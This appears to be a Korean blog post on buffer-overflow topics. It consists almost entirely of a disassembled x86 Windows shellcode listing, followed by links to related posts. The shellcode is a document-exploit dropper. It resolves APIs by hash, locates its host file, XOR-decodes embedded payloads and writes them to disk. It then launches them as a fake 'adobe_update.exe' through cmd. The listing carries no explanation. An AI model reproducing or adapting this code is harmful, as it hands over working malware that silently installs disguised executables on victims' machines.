call $+5
push 0Ch
jmp short loc_401099
db 4Ch, 22h, 80h
dd 8AFE987Ch, 0DA08AC0Eh, 0B5B98376h, 7D9BAD78h
dd 0FD97FBDFh, 8A49EA0Fh, 238ADBE8h, 0FA6516E9h
dd 8F17E610h, 0B922F67Bh, 397EC7Ch, 646D630Ch
dd 20632F20h, 615C3A63h, 65626F64h, 6470755Fh
dd 2E657461h, 657865h, 0
dd 5C3A6300h, 61746164h, 4558452Eh, 0
dd 5C3A6300h, 61746164h, 4E49622Eh, 0
db 0
loc_401099:
pop ecx
pop edi
scasd
mov eax, fs:30h
mov eax, [eax+0Ch]
mov esi, [eax+1Ch]
lodsd
mov ebp, [eax+8]
loc_4010AB:
push ecx
mov esi, [ebp+3Ch]
mov esi, [esi+ebp+78h]
add esi, ebp
push esi
mov esi, [esi+20h]
add esi, ebp
xor ecx, ecx
dec ecx
loc_4010BE:
inc ecx
lodsd
add eax, ebp
xor ebx, ebx
loc_4010C4:
movsx edx, byte ptr [eax]
cmp dl, dh
jz short loc_4010D3
ror ebx, 0Dh
add ebx, edx
inc eax
jmp short loc_4010C4
loc_4010D3:
cmp ebx, [edi]
jnz short loc_4010BE
pop esi
mov ebx, [esi+24h]
add ebx, ebp
mov cx, [ebx+ecx*2]
mov ebx, [esi+1Ch]
add ebx, ebp
mov eax, [ebx+ecx*4]
add eax, ebp
stosd
pop ecx
loop loc_4010AB
sub edi, 38h
xor esi, esi
loc_4010F4:
inc esi
lea eax, [edi+80h]
push eax
push esi
call dword ptr [edi+18h]
cmp eax, 0FFFFFFFFh
jz short loc_4010F4
cmp eax, 1000h
jbe short loc_4010F4
mov [edi+4], eax
mov [edi+80h], esi
push dword ptr [edi+4]
push 40h
call dword ptr [edi+34h]
mov [edi+7Ch], eax
push 0
push 0
push 0
push dword ptr [edi+80h]
call dword ptr [edi+10h]
cmp eax, 0FFFFFFFFh
jz short loc_40118B
push 0
lea ebx, [edi+90h]
push ebx
push dword ptr [edi+4]
push dword ptr [edi+7Ch]
push dword ptr [edi+80h]
call dword ptr [edi+28h]
mov ecx, [edi+90h]
sub ecx, 0Ah
mov eax, [edi+7Ch]
loc_401158:
inc eax
cmp dword ptr [eax], 4B435646h
jnz short loc_40116A
cmp dword ptr [eax+4], 19890604h
jz short loc_40116E
loc_40116A:
loop loc_401158
jmp short loc_40118B
loc_40116E:
add eax, 8
mov [edi+94h], eax
loc_401177:
inc eax
cmp dword ptr [eax], 614B614Bh
jnz short loc_401189
cmp dword ptr [eax+4], 19811106h
jz short loc_401197
loc_401189:
loop loc_401177
loc_40118B:
push dword ptr [edi+7Ch]
call dword ptr [edi+30h]
jnz loc_4010F4
loc_401197:
mov [edi+98h], eax
push 2
lea esi, [edi+3Fh]
push esi
call dword ptr [edi+20h]
mov [edi], eax
push 2
lea esi, [edi+58h]
push esi
call dword ptr [edi+20h]
mov [edi+9Ch], eax
push 2
lea esi, [edi+68h]
push esi
call dword ptr [edi+20h]
mov [edi+0A0h], eax
mov ebx, [edi+98h]
sub ebx, [edi+94h]
mov eax, [edi+94h]
loc_4011D8:
xor [eax], bl
dec ebx
inc eax
cmp ebx, 0
jnz short loc_4011D8
mov eax, [edi+94h]
mov ecx, [eax]
mov [edi+0A4h], ecx
add eax, 4
mov ecx, [eax]
mov [edi+0A8h], ecx
add eax, 4
mov ecx, [eax]
mov [edi+0ACh], ecx
add eax, 4
mov esi, eax
push dword ptr [edi+0A4h]
push esi
push dword ptr [edi]
call dword ptr [edi+24h]
push dword ptr [edi+0A8h]
add esi, [edi+0A4h]
push esi
push dword ptr [edi+9Ch]
call dword ptr [edi+24h]
push dword ptr [edi+0ACh]
add esi, [edi+0A8h]
push esi
push dword ptr [edi+0A0h]
call dword ptr [edi+24h]
push dword ptr [edi]
call dword ptr [edi+1Ch]
push dword ptr [edi+9Ch]
call dword ptr [edi+1Ch]
push dword ptr [edi+0A0h]
call dword ptr [edi+1Ch]
call dword ptr [edi+8]
push eax
lea esi, [edi+3Fh]
mov edx, esi
loc_401262:
mov al, [edx]
inc edx
or al, al
jz short loc_40126B
jmp short loc_401262
loc_40126B:
mov byte ptr [edx-1], 20h
pop ecx
loc_401270:
mov al, [ecx]
or al, al
jz short loc_40127C
mov [edx], al
inc edx
inc ecx
jmp short loc_401270
loc_40127C:
mov [edx], al
sub esi, 7
call $+5
add [esp+4+var_4], 0Dh
push 0
push esi
push dword ptr [edi+2Ch]
jmp dword ptr [edi+0Ch]
start endp
db 6Ah
dd 0FFFF6A00h, 90901457h, 90909090h, 0B58h dup(0)
_text ends
'bof' 카테고리의 다른 글
| arm bof에 대한 문서 (0) | 2011.02.11 |
|---|---|
| bof 문서들 (0) | 2010.07.22 |
| RTL BOF : (Return To Library Buffer Over Flow) (0) | 2010.06.03 |
| bof ppt 정리 (0) | 2010.03.28 |
| bof 공격 (0) | 2010.03.28 |